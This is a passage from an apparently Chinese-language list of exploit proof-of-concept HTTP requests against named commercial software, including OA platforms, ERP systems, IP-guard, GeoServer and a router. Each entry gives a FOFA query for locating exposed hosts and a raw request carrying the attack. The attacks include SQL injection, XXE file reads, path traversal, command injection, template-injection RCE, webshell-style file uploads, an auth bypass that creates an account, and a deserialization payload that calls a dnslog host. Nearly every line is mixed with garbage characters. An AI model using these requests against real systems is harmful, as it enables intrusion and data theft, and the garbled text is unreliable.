# L6 j: d4 I8 e* R2 c. pHost: x.x.x.x
) G. k, {6 l- WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36* t [4 F" g {, k, N \
Content-Type: application/json
+ [) J% z. p# m L% c, @
, L" x& ?; K$ b K1 |; e{
8 B) Q N c: g( n6 V "storeID":{
5 m# n5 t( P( l/ ^5 F) s6 H } "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",( D$ ]) m y& S' _9 O) R* S
"MethodName":"Start",- C* M7 a4 Q6 F) O8 g" K
"ObjectInstance":{$ ?( s; U1 C$ v7 z
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",8 K% J2 C V0 J' E( x* Y9 f' `
"StartInfo": {' o- \! k! n. z- Y6 ?+ E7 A
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0 X$ c2 I. N7 P( ~' ]
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw", h* V# @$ y- c) W/ z" k3 B% |
}
0 E! Q# `. K, @% S }) A( H( `2 X- i& R
}* R2 L+ a: K3 s1 Z4 l
}+ U# a% u. b$ P: V
" l/ d5 \& D: g8 t6 s
7 s& X& i6 P( ~5 B) H9 ^; L$ j' n; y57. 畅捷通T+ keyEdit.aspx SQL注入, N! P1 u0 T2 Q' M2 b
FOFA:app="畅捷通-TPlus"( r5 p5 `2 Q9 f- o1 L9 D) I
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
1 ?3 z; i' h; `5 H- w0 y* \3 sHost: host
( t" ` Q2 T0 v9 v8 _User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.366 s# C5 x! J- `0 ^! P
Accept-Charset: utf-8, e: E7 V* d( z i1 P) O
Accept-Encoding: gzip, deflate* f7 P4 \% b4 R% ]0 \8 u
Connection: close( K. R5 M" f: T8 r' k3 v4 h8 r& H
w5 J2 M" S8 j/ M* U5 j4 A
- l4 k8 D# d7 G H. e- g5 s2 h* D. O
58. 畅捷通T+ KeyInfoList.aspx sql注入* s b# ?$ j( |4 [; {7 x5 v
FOFA:app="畅捷通-TPlus"6 Z, P+ ]0 w% l* N+ _
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1) Q k# A8 E" c2 x
Host: your-ip
5 C* z8 x- a! F( d$ l% @8 EUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36 x3 r( o) L# x% f8 C( M7 p9 ~
Accept-Charset: utf-8' U# z n, [) {. a
Accept-Encoding: gzip, deflate1 P; A3 i! D4 a
Connection: close0 x/ l* o4 F/ w- G6 [7 R
" x$ q( X9 I% E( B- ?+ v/ [3 M* ]2 h% l% A i
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
! O; H7 ~4 L* E- |FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"7 Y F2 ^+ G# l& b# K+ H! ^0 _
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1. w' {/ a7 A5 U# C2 J4 A
Host: 192.168.86.128:9090
% d5 g2 r' T' d" D6 y( pUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36! h. |0 R }$ p' j8 L
Connection: close2 c1 p8 O0 o; `) o( Y2 d
Content-Length: 16697 s1 L# ]' d. R. d/ s7 M& Y. K
Accept: */*
0 m) Y3 t. P7 k, ~Accept-Language: en) S0 i0 O5 y# k1 D$ N8 T. ?+ h8 w- g
Content-Type: application/x-www-form-urlencoded
3 t# N0 ^! i/ r9 k/ H" M& KAccept-Encoding: gzip
: Z$ z' ]. J& L q$ p+ W
3 }6 i5 O7 h7 Q$ u$ \, A- bPAYLOAD( O3 X: v; K7 t: Q! s9 _9 g
' x- m" F7 J3 Z; B
! H- W+ D( N F/ k5 R( ]# R6 X60. 百卓Smart管理平台 importexport.php SQL注入
, E! X, v# x; @5 tFOFA:title="Smart管理平台"
/ m; N1 A c/ @3 AGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
* s# u# k( ~+ O M* Q" J; K! OHost:
3 v% |5 b( S* NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36( Z0 ?( [8 T# d6 v* ^% ?1 \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 [* \' e; g" u2 L: v* a
Accept-Encoding: gzip, deflate0 |+ _4 S Y: p4 c( l; Y
Accept-Language: zh-CN,zh;q=0.9' S0 z, D" G! C; N! E; L
Connection: close
( f: h1 N- s7 k) t# i2 K. R5 F, e+ [$ C
' I% H/ B6 {$ ]% n' V0 E7 `" O
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传4 o! R/ ^/ H0 n6 E
FOFA: title="欢迎使用浙大恩特客户资源管理系统"# W! o1 W8 |8 j) W7 Q% N
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
7 z% [% P+ y# H, ]$ RHost: x.x.x.x+ h) X* u+ c- q' U! i" Z* ~1 l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: L3 d1 c( T& w% K6 V
Connection: close# K4 y1 k' |$ U/ X7 B% g5 l( k
Content-Length: 27
% {) i* C( S- H# V: @' fAccept: */*
9 I: Z3 c* s$ g5 f1 dAccept-Encoding: gzip, deflate
, X9 X5 {4 d! b2 ~, ^, g* {0 oAccept-Language: en
# l8 S& o9 j" b5 k3 |7 hContent-Type: application/x-www-form-urlencoded2 M+ L( n8 h5 k; j- O4 O: ]
( Y( R/ R& h% j; E3 I, |( p, F( d3 J- ~8uxssX66eqrqtKObcVa0kid98xa
, e: D' c4 [( R) {1 E& k: e6 A$ v Q% k2 N/ N4 P( }
4 g% j% _# {) Z5 t3 f- y
62. IP-guard WebServer 远程命令执行
0 y( R! e. a. s7 M- @! lFOFA:"IP-guard" && icon_hash="2030860561"( l1 }2 ^8 p& D* N
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
* \* U9 w, ] X$ k, ^. bHost: x.x.x.x
, H" t& t8 r: ZUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
9 l8 o( Y1 ^" W' t2 XConnection: close& ]; U u+ a3 a1 T9 }4 s7 _
Accept: */*
9 H1 R3 w( r: VAccept-Language: en' h9 E$ \1 h) _% z& m8 }/ D2 d$ G
Accept-Encoding: gzip E+ h& G+ t- [5 K! w
9 o. y6 Z/ v6 E/ ?3 S* H
$ E5 w! Z/ L) z8 E1 j8 l访问
2 b- g* q3 o* x
5 n1 j' |0 _" [7 ?9 R* b z+ AGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1- Z1 k8 \: d3 l1 b/ O) v5 `
Host: x.x.x.x
' B/ x4 G0 V% E+ I& z0 R
: i9 J- ?! ]4 M* s2 F* n7 j
( i/ T9 X& J9 ?! e63. IP-guard WebServer任意文件读取
$ o" g4 p k2 L/ s4 F" }IP-guard < 4.82.0609.04 ^: W- t4 j# g5 o# {( W" m9 E
FOFA:icon_hash="2030860561"
/ G* Y, a3 q3 w- L& \POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
; V$ E* a! ? }' I1 S$ g! l# K) n" yHost: your-ip
- t7 Z7 l2 X d+ u0 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36' `1 B5 |* T6 m4 O& {1 K" d/ M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* p" d( g6 F; x$ O8 \0 N1 D$ e* C
Accept-Encoding: gzip, deflate( x h4 ?" B& Z- {' b
Accept-Language: zh-CN,zh;q=0.9
; Z( V C; }0 D$ {4 sConnection: close
- a y" d5 X, P* M8 [5 V7 V, TContent-Type: application/x-www-form-urlencoded
5 z; }$ C, F& l3 L! O% L5 ~6 Z# C/ {$ K$ @/ n4 M$ b
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
+ X/ M6 L- {" V4 G2 ^$ I% G& G3 S& i6 Y* N' [0 R( w( r0 S( o; h; \
64. 捷诚管理信息系统CWSFinanceCommon SQL注入" e4 `- Y; B; p: G D" {* {
FOFA:body="/Scripts/EnjoyMsg.js"
, I5 w& i& S8 C& b' ?0 y( \7 X6 h5 `POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
' m! e. d$ ~' F; r n8 t) r% J# ?Host: 192.168.86.128:9001' c* l/ }/ _' h; a0 f m
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36: D& l+ R/ B( m8 m& }$ h% f
Connection: close
; ^! C0 A& g. H2 VContent-Length: 3694 G8 f! A1 Z! x, _2 d' p4 h' `
Accept: */*1 y0 K9 v0 a1 r0 ?! J
Accept-Language: en
, A: W; h- U: K; g; v* U m' ]4 E3 GContent-Type: text/xml; charset=utf-8
9 t* E6 s6 B, L) fAccept-Encoding: gzip2 w! |, R! [! X4 H
8 k% \" N3 A9 p3 B) b, t
<?xml version="1.0" encoding="utf-8"?>) F1 H( m% I6 m1 }1 s- |4 Z
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">- p8 P ^( h9 F n
<soap:Body>4 ^# Q y8 W$ Z3 ?$ }' t3 e
<GetOSpById xmlns="http://tempuri.org/"># N8 ?8 C2 E; n. q
<sId>1';waitfor delay '0:0:5'--+</sId>
* W. ?! A2 Q1 z4 L9 T; @7 s </GetOSpById>
: P3 f* ^7 S9 H8 a: W6 W( | </soap:Body>4 m* w+ W1 h) n5 |+ ?
</soap:Envelope>
* p" y. ^5 n6 m y# [* H9 Z3 ~
2 m5 X0 x2 O& {9 {5 [8 p" h5 X. |+ C& Q* h2 R. ]
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过" {5 d9 O# Z2 Z; F) G
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
# Q( C3 d% b' Q+ u, v: _响应200即成功创建账号test123456/123456# B* C3 a, C! s+ E
POST /SystemMng.ashx HTTP/1.1; y# a$ l* y# I6 S3 g( g! i
Host:6 t) R, ?% q7 F! D
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)* A7 W T8 I& ]% ?) M
Accept-Encoding: gzip, deflate$ H9 r7 S4 s% k8 J* y
Accept: */*
. ^8 _0 M+ N" d4 JConnection: close) P7 T: \9 s' J( W* p! \4 ?6 Y0 z
Accept-Language: en
8 K- k+ @- O* L* ]& j/ KContent-Length: 174
* l# W- L: V( v$ R# M
6 H5 N+ C9 j3 c; A$ M5 {operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators5 {' U M: X" ~
5 D0 T/ D6 f4 K2 u7 v5 L
. @# a1 W% A. ?+ q1 [66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入- ~1 ~9 ?0 o+ o+ N
FOFA:app="万户ezOFFICE协同管理平台"5 \$ |9 v5 c+ @( R: P. z
5 q8 n6 p1 @8 S; j2 h# aGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
0 ]2 H0 S8 [* S) LHost: x.x.x.x
$ |1 o7 K5 M0 x% g" Q! NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36. G+ N$ h, S$ j' s; f
Connection: close+ R% K* y( ]& Z& |5 D) B6 ~' ^1 d; ]9 a
Accept: */*" _0 N9 w1 E$ E2 J- J1 M5 D/ u
Accept-Language: en! V) Q& o+ S0 v
Accept-Encoding: gzip
0 Y" x2 G+ Q9 Q7 A. Y& B% N* a3 k% ^+ i' `9 C6 w* [/ R; \
. `" V; A7 _4 G第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在5 J* C/ o$ e* Y4 U* |
. Z; O7 s' S! P; q+ w67. 万户ezOFFICE wpsservlet任意文件上传$ L7 g2 }$ V7 X" J: S( e# P5 N
FOFA:app="万户网络-ezOFFICE"- {; K, D" W1 z4 o3 z
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型$ a' @- u8 |* k
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
& G" D1 l% G1 v' b& V6 _8 bHost: x.x.x.x
& K2 S1 u' d% e) D0 F6 PUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0, Q7 O9 t/ t6 X5 m2 z
Content-Length: 173" j4 l8 _7 L- S0 [. q! Y' j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
. a- l2 i; n" V& a0 o1 b+ [& _8 _Accept-Encoding: gzip, deflate
, S& v$ [6 r& E( IAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.33 L. ?, l: w0 F
Connection: close
z+ r/ l) ?, r9 P) s4 o& K, [" ZContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
0 n! O* I; P* L; y( ZDNT: 1* u( p) Z5 D& @: d7 h
Upgrade-Insecure-Requests: 1
: Z# u4 L( N1 u! d- ^& H6 ~" q2 I/ R$ N9 ^" K
--ufuadpxathqvxfqnuyuqaozvseiueerp) N7 X3 r0 n! L. @) M- n
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"$ ^8 @! s. h5 j/ z- B- y
. N6 g. e( @0 u; r+ O% ?* E1 B<% out.print("sasdfghjkj");%>* f3 ^. H: G/ E# g0 ~5 S
--ufuadpxathqvxfqnuyuqaozvseiueerp--/ p% t9 b( \8 K. Z) s1 U. Z
L, T6 L; ~4 B5 p4 J! l- H8 P5 \9 X& N& F' Y" I$ k& N/ Q. R; h
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
& m% ]0 `: _4 L' q- u, n; [4 O- q( `3 @- e
68. 万户ezOFFICE wf_printnum.jsp SQL注入
2 s$ d; P$ t( L( R% k) ]# O0 l" {FOFA:app="万户ezOFFICE协同管理平台"; y7 l/ A& @. p1 l% x
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.11 V; l6 M2 f8 N) _$ r$ F% d
Host: {{host}}
# ]9 ?8 ^# @! S5 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.364 \: _! j% r* ]/ i2 R
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8. t6 J( D- y- J& f9 P; j* [
Accept-Encoding: gzip, deflate V) x5 h" t ?) s8 k M6 Z' _
Accept-Language: zh-CN,zh;q=0.9
1 m; ]; ]2 {- H; o5 A, k4 qConnection: close
7 T, f+ E. I y5 ?7 O7 h& ]7 b$ Z4 X
, ]5 e& ?5 f1 q, ]) q0 B$ L8 {. t
69. 万户 ezOFFICE contract_gd.jsp SQL注入( f0 R L2 ^! y# w+ b' J) H
FOFA:app="万户ezOFFICE协同管理平台"& t6 p7 U1 Z: ~( J: d7 @' @; j9 @3 ]
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
8 ^/ B+ { F. z/ eHost: your-ip
1 ?! O% c; } x6 [% ~7 j& f/ \User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36, g0 s5 e% l; B& B% i% S
Accept-Encoding: gzip, deflate* Y- Q" l1 ?0 ~5 M
Accept: */*9 \8 Q1 Y9 m; k, S/ l
Connection: keep-alive
- v# S s, C' b3 |# l. _
4 R: t5 Q5 j2 r& c4 |; _$ w' Y, h1 I; d2 s3 k3 q7 X+ E
70. 万户ezEIP success 命令执行
5 J( D, }0 l Q- }( x; RFOFA:app="万户网络-ezEIP"
/ w6 y- t6 W7 I2 ?POST /member/success.aspx HTTP/1.1
5 u$ \! r" B3 e5 E9 {5 DHost: {{Hostname}}
0 r$ m( y, T; I( ~, r* cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.360 d. T1 Y, [' H) W
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=( W( {( z6 a! E' f5 }
Content-Type: application/x-www-form-urlencoded
4 {3 _3 B" c, G3 b. |3 E. MTYPE: C
, ?( O7 ]5 X1 n, y) j2 jContent-Length: 167029 j, T; K) R$ Z4 [- R9 V3 i& X
- o9 c( w! }2 {__VIEWSTATE=PAYLOAD
' {2 e' u! o# Q9 z9 y
3 i- g7 r( R5 T6 y0 E: Q8 O$ N8 }- h
( V/ _( T7 W9 R1 U4 L& w+ x71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
4 ^6 y! D6 p7 b ^FOFA:body="PM2项目管理系统BS版增强工具.zip"
u1 o' i( @3 J0 v2 K% s8 i8 {3 pGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
5 p% S0 z( z3 l) ?Host: x.x.x.xx.x.x.x
9 j6 v9 C- X q! J8 }User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36/ l. \! _. e8 d. S
Connection: close' ^: \' P9 _1 J+ b& I' Z' D% D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 ~3 F s `8 P% i; x# i" M
Accept-Encoding: gzip, deflate8 k% } Z5 P* |- e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ F. H7 ?; v: N- ^! n3 w9 m0 e& tUpgrade-Insecure-Requests: 11 ]6 s8 q* K/ e2 b! z
0 N. P! M& ^+ F# U/ L: H2 S
6 b0 ? P* l8 u% ?4 N; M0 y
72. 致远OA getAjaxDataServlet XXE
4 L0 e9 k4 N7 w* o3 [$ lFOFA:app="致远互联-OA"
7 { l1 z, R5 b; V/ m* _POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.10 b( X7 a6 P; q* H
Host: 192.168.40.131:8099: c; s7 o5 v9 Q& \
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36! W$ E9 e4 R# ?
Connection: close
4 J5 B9 G# C6 N9 N# B8 u% jContent-Length: 583
1 P |5 X3 m5 L' A3 L# d" C x- f8 CContent-Type: application/x-www-form-urlencoded
0 ` W& p- H2 q) TAccept-Encoding: gzip
+ G: Z# p8 V1 X e4 F2 e
6 Z- L% d2 M/ VS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
) \2 A. `- i" B% d. Q- ]: d8 P0 U
2 z$ Q1 H; T8 N; \' m; j( n0 a73. GeoServer wms远程代码执行
3 Y, P/ D9 n9 l- o5 q8 ~6 X! FFOFA:icon_hash=”97540678”
0 w( D8 k7 T* SPOST /geoserver/wms HTTP/1.1
, b6 ^+ p# K1 S9 B$ D4 Z( B8 LHost:
, Z4 F7 w: _+ \! n& G+ n* Y1 d$ aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
( X2 s/ S( F1 j+ H6 }Content-Length: 1981
: W8 T9 S7 o% c6 H9 i$ J0 fAccept-Encoding: gzip, deflate
1 G2 |+ w1 O$ D. }Connection: close. {/ f* X2 j. u/ E$ T& L! Q
Content-Type: application/xml
7 o+ j6 u) b2 |SL-CE-SUID: 3
: _! Z& p1 R7 [$ g9 }$ P" ^; R
0 W- E5 p. i% o: W% RPAYLOAD
; e8 G0 C6 N3 R8 L
5 V# Q- R& W/ X& O% X4 ?% E* p/ B( a {4 ?% z0 L: W
74. 致远M3-server 6_1sp1 反序列化RCE+ A7 [5 `2 h( n0 S
FOFA:title="M3-Server"( }2 |2 C, ~7 h. @2 [
PAYLOAD: p- b* n8 R' e# R! `! l
, @- P% N3 `4 U; v- P; |
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
! i4 t$ R! r( J/ vFOFA:app="TELESQUARE-TLR-2005KSH"8 B/ C2 {3 v5 Q3 |! a) \: D+ r
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.11 @+ k3 x9 L( L$ N+ x! D* O9 M
Host: x.x.x.x) R0 P3 a# x# N) r6 q; z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' X' y+ v1 C# x) a- DConnection: close* ]2 U4 M3 H$ |% v% c& y
Accept: */*
2 N6 Y/ P) x) n" d* p1 jAccept-Language: en& o6 G8 o; ^) l. f# _
Accept-Encoding: gzip
$ D9 ~3 D* t U* {- Y4 @* ?* s1 H. d
1 q: K% b: ]# q; _) ^0 x9 ~4 Q
GET /cgi-bin/test28256.txt HTTP/1.12 J( m) z& q- [. C$ h9 ]
Host: x.x.x.x
( _$ n" l% B! t# G" g" i! k+ N
& r5 ?8 L* A0 Z% C, m; O2 b7 F7 a1 \, T3 ?6 v& ^4 j: m
76. 新开普掌上校园服务管理平台service.action远程命令执行' T6 a" v9 m4 j+ X% ]
FOFA:title="掌上校园服务管理平台"
1 h: B6 e/ \9 F$ mPOST /service_transport/service.action HTTP/1.1# b+ J8 T, X3 _& s
Host: x.x.x.x
; }- e4 m) k y1 C( UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.02 r9 c1 f8 X8 L2 w( X6 ^5 v, V6 x
Connection: close q+ p% D% t+ t$ @# d" m4 Q5 ^
Content-Length: 211
' l! L3 v9 B# `+ {! k4 A, U3 f6 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' _6 q: z6 j5 e6 m" y) i) N
Accept-Encoding: gzip, deflate
9 N. f) ^$ W3 ~, K' uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: e( I' U& l7 d7 f' ECookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
2 Q) m2 V5 r4 R9 XUpgrade-Insecure-Requests: 1
o: y: T# Q: X4 C" ~, _
( V# v* H0 D" ^2 v8 L{% ^% E3 M; Q. X. r
"command": "GetFZinfo",' A) g0 E! L) B4 X5 M" E* p0 ]" R0 d
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
$ e2 D- R; b1 ^- Q2 b8 g ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}") ?' M9 q8 P7 C6 t) I1 R
}
: Z/ n( N% @$ j$ k* Y
8 u' e4 S% h8 }8 U/ P
& y, b2 M; f% t0 ?( a6 ~& d. jGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
8 L0 Q5 `+ s* @' M9 D$ Z$ G7 GHost: x.x.x.x# A& j- s x- K9 [8 j) i7 ^
8 Y4 i/ C. h+ x# l" l: g) k: y
+ c( p3 F2 I- d! m
$ G/ J6 Y( A4 P. e
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
* S; O9 g9 o4 o. y: _# jFOFA:body="F22WEB登陆"
& M: z+ c* s7 [) L& ^+ VPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.16 f2 l$ E: Z, K; e+ O
Host: x.x.x.x! s- w& J$ r' y, O2 O1 z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36# O/ _; i; J0 n5 Q, n/ a* e3 a9 `
Connection: close! C! n+ C# G# S
Content-Length: 433" }; s! c# ?' `. O
Accept: */*
( x. S. L5 a" d/ T' X4 D5 U( q& L5 mAccept-Encoding: gzip, deflate
E; Q+ |) E, ?5 z; MAccept-Language: zh-CN,zh;q=0.90 r6 `- x# S" d& b
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
. q5 P- t" J# z7 x2 o
9 R: r- U, s; u% h------------398jnjVTTlDVXHlE7yYnfwBoix
/ \* B& o# c# b$ k! k( a& sContent-Disposition: form-data; name="folder"
" B: b. B. A i c
6 c% w: w* Q8 a, Q6 z& f9 c* \/upload/udplog
* }* `$ [# B0 r/ I0 o------------398jnjVTTlDVXHlE7yYnfwBoix" j ~, e+ ~2 p$ y4 p
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"! M* B1 Z* u$ t# n
Content-Type: application/octet-stream4 @3 k. Y. Z5 O5 ]: b+ r6 `$ `& {
# |3 I L% e8 a9 \9 S6 V# ~
hello12345678 _/ _5 l$ E9 S' q' ~+ Y
------------398jnjVTTlDVXHlE7yYnfwBoix" g+ m% O% X& d2 f! p# v
Content-Disposition: form-data; name="Upload"# J5 t7 o* ~- k G8 q
! f3 [- Z/ s! P; n( W7 zSubmit Query
6 u7 b& n% a u! V E5 }, ]+ R------------398jnjVTTlDVXHlE7yYnfwBoix--
! ] k/ y! ^1 A- |; V9 {7 v
6 w5 G8 ~- @3 Y* L+ v
0 B! T6 N7 G) s78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
5 w# \/ k$ c. q9 t: A eFOFA:icon_hash="2001627082"
/ g! K: l4 l8 D" e, IPOST /Platform/System/FileUpload.ashx HTTP/1.1' p1 U2 I/ H' w4 L& x
Host: x.x.x.x
# Z. H- T! y3 x# U1 hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 h0 `& W; ]6 r! o5 CConnection: close
9 d/ L3 c f8 @( f. D1 rContent-Length: 336 x6 G6 i3 H- N2 z* X$ v
Accept-Encoding: gzip
% |# B6 ?. s* h9 u7 V1 HContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
5 d' V z% n& f0 ?/ e; S
2 E+ S( ]' k- I* R" i3 h------YsOxWxSvj1KyZow1PTsh98fdu6l
+ s% M& W4 p9 u, [1 [' uContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
